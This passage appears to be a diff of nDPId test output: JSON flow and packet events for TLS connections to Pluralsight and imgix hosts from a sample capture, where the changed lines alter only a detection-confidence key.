01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1648373357879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI55z9AAEAGvjvAqAGAkks+0KcmAbuYBq2ULUf1TIAYAfb0QgAAAQEICq4tykD1hBcPFgMBAgABAAH8AwMVCkjcl1ldHYszMMhbvCrBmyAv89Ky2j4DTP7XcUyMOSBZfmcNBQmySrBYu\/Xc6jDaJEswZCfnt+SXnGDnGRc5VwAgCgoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABoAGAAAFXBsdXJhbHNpZ2h0LmltZ2l4Lm5ldAAXAAD\/AQABAAAKAAoACBoaAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApGhoAAQAAHQAgibFRT+4ffFiWVzdt9+CHYgJvYueRYWReY4H44PP66lMALQACAQEAKwAHBurqAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAMIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357861,"flow_last_seen":1648373357879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 
-01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} 
+00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357861,"flow_last_seen":1648373357879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 
+01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373358908,"flow_last_seen":1648373358908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373358908,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1648373358908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358908,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPxAAEAG95PAqAGAEsvJOKZ6AbsXjcxKAAAAAKAC+vDGJwAAAgQFtAQCCAq7LqF\/AAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1648373358948,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358948,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOUG948Sy8k4wKgBgAG7pnpgCgHJF43MS6ASaN+FjQAAAgQFtAQCCAqVXttnuy6hfwEDAwg="} 
01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1648373358949,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373358949,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pP5AAEAG9ZTAqAGAEsvJOKZ6AbsXjcxLYAoByoAYAfahVQAAAQEICrsuoaiVXttnFgMBAgABAAH8AwPQaIxCQafGfU7U68BjTWz12bgC7rPMRDrwBcYKkg2BtiCsXEdEYhfEEMAlvDmVmL\/9\/3dvAf\/ZUZkvazPc8sBEAwAg6uoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAABgAFgAAE3N0dC5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAhaWgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKVpaAAEAAB0AIC1NIbYz00S\/PDWD2znXWT+4vqGbUzfdyPQt1wB6uPFJAC0AAgEBACsABwb6+gMEAwMAGwADAgACRGkABQADAmgyuroAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373358908,"flow_last_seen":1648373358949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373358949,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373358908,"flow_last_seen":1648373358988,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373358988,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01250{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373358908,"flow_last_seen":1648373358992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4861,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1648373358992,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","server_names":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, CN=stt.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C5:A3:DE:6D:71:B1:15:77:EC:86:38:E6:30:1C:F5:AC:18:9D:BE:82"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373358908,"flow_last_seen":1648373358949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373358949,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 
+00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373358908,"flow_last_seen":1648373358988,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373358988,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01250{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373358908,"flow_last_seen":1648373358992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4861,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1648373358992,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","server_names":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, 
ST=California, L=San Jose, O=Adobe Systems Incorporated, CN=stt.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C5:A3:DE:6D:71:B1:15:77:EC:86:38:E6:30:1C:F5:AC:18:9D:BE:82"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359576,"flow_last_seen":1648373359576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359576,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1648373359576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359576,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TutAAEAGHxbAqAGAaBOif780Abvdb02GAAAAAKAC+vDHywAAAgQFtAQCCArb1PDNAAAAAAEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1648373359597,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359597,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGdQloE6J\/wKgBgAG7vzSUVFy03W9Nh4AS\/\/\/FjwAAAgQFeAEBBAIBAwMK"} 
01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1648373359600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359600,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItTu1AAEAGHSPAqAGAaBOif780Abvdb02HlFRctVAYAfYwgAAAFgMBAgABAAH8AwOIgQTFWwPXqiGWcEl1+ZXYiujgmOb6nQAZYCe\/QQpLyiA8RROCb85LShovAJOvtUQPlP7tKhROlf321DTdV6NmHgAgysoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGT2toAAAAAABgAFgAAE3d3dy5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAgKCgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKQoKAAEAAB0AIEbEu4abSNoKA92bDrKiGkIvMOu6w9kvXP7U129h\/FVaAC0AAgEBACsABwaamgMEAwMAGwADAgACRGkABQADAmgyGhoAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359576,"flow_last_seen":1648373359600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359600,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
